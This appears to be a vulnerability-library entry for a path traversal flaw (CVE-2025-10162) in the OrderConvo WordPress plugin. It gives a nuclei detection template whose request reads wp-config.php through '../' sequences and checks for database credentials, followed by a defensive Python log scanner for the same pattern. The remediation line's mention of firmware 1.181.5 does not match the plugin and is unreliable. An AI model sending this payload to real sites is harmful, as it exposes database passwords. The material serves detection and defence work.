WordPress OrderConvo < 14 - Path Traversal

CVE-2025-10162
Verified

Description

WooCommerce OrderConvo WordPress plugin < 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely.

Severity

High

CVSS Score

7.5

Exploit Probability

39%

Published Date

May 4, 2026

Template Author

0x_akoko

CVE-2025-10162.yaml
id: CVE-2025-10162

info:
  name: WordPress OrderConvo < 14 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
   WooCommerce OrderConvo WordPress plugin < 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely
  impact: |
   Unauthenticated attackers can read or download arbitrary files, potentially exposing sensitive information.
  remediation: |
   Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/
    - https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10162
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-10162
    cwe-id: CWE-22
    epss-score: 0.38811
    epss-percentile: 0.97316
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wp,wp-plugin,wordpress,woocommerce,orderconvo,wooconvo,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c6c85eeaebbe3dd7d48a0711f9ff7a91e5c8ee0f14e5e6b269073bfd8aa650a022100cfd93e6d265487a61e7fcb51f989ebc57a231723f3258f8d0697262e5820dd30:922c64590222798bb761d5b6d8e72950
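The template above detects the issue by requesting the endpoint directly. For a defender reviewing existing traffic, the same indicators (the `wooconvo` download-file route and a traversal sequence in `filename`) can be checked over web-server access logs. The following Python script is an added example, not part of this library entry or of the nuclei template; it parses constructed combined-format log lines (the IPs, timestamps and sizes are made up), URL-decodes the `filename` parameter repeatedly so that single- and double-encoded traversal variants are caught, and reports each hit with its response status so that a 200 can be triaged as a probable disclosure rather than a blocked probe.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [04/May/2026:10:00:01 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php HTTP/1.1" 200 3117 "-" "curl/8.0"
203.0.113.11 - - [04/May/2026:10:00:02 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=42&filename=invoice-42.pdf HTTP/1.1" 200 58211 "-" "Mozilla/5.0"
203.0.113.12 - - [04/May/2026:10:00:03 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=1&filename=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 0 "-" "python-requests/2.31"
203.0.113.13 - - [04/May/2026:10:00:04 +0000] "GET /wp-json/wooconvo/v1/download-file?order_id=7&filename=%252e%252e%252fwp-config.php HTTP/1.1" 200 3117 "-" "-"
203.0.113.14 - - [04/May/2026:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# REST route and query parameter named in the template above.
ENDPOINT = "/wp-json/wooconvo/v1/download-file"
PARAM = "filename"

# A ".." path component bounded by a separator or the string edge.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so %252e%252e%252f collapses to ../."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(filename: str) -> bool:
    """True when the decoded filename contains a parent-directory component."""
    return bool(TRAVERSAL_RE.search(fully_decode(filename)))


def scan_log(text: str) -> list:
    """Return one record per request that targets the download route with a
    traversal sequence in its filename parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = urlsplit(m.group("target"))
        if parts.path.rstrip("/") != ENDPOINT:
            continue
        # parse_qs applies one round of decoding; fully_decode handles the rest.
        for fname in parse_qs(parts.query).get(PARAM, []):
            if is_traversal(fname):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": int(m.group("status")),
                    "filename": fully_decode(fname),
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "PROBABLE DISCLOSURE" if hit["status"] == 200 else "blocked/failed"
        print(f'{hit["ts"]} {hit["ip"]} {hit["filename"]} -> {hit["status"]} ({flag})')
```

Running it over the constructed log reports three of the five lines: the plain, single-encoded and double-encoded traversal requests, while the legitimate `invoice-42.pdf` download and the unrelated `/index.php` request are left alone. A 200 on a flagged request is the case worth escalating, since the template's own matcher treats a 200 body containing `DB_NAME` and `DB_PASSWORD` as confirmation that `wp-config.php` was served.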

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-10162
CWE ID:
cwe-22

References

https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/
https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
https://nvd.nist.gov/vuln/detail/CVE-2025-10162

Remediation Steps

Update firmware to a version later than 1.181.5 or the latest available version.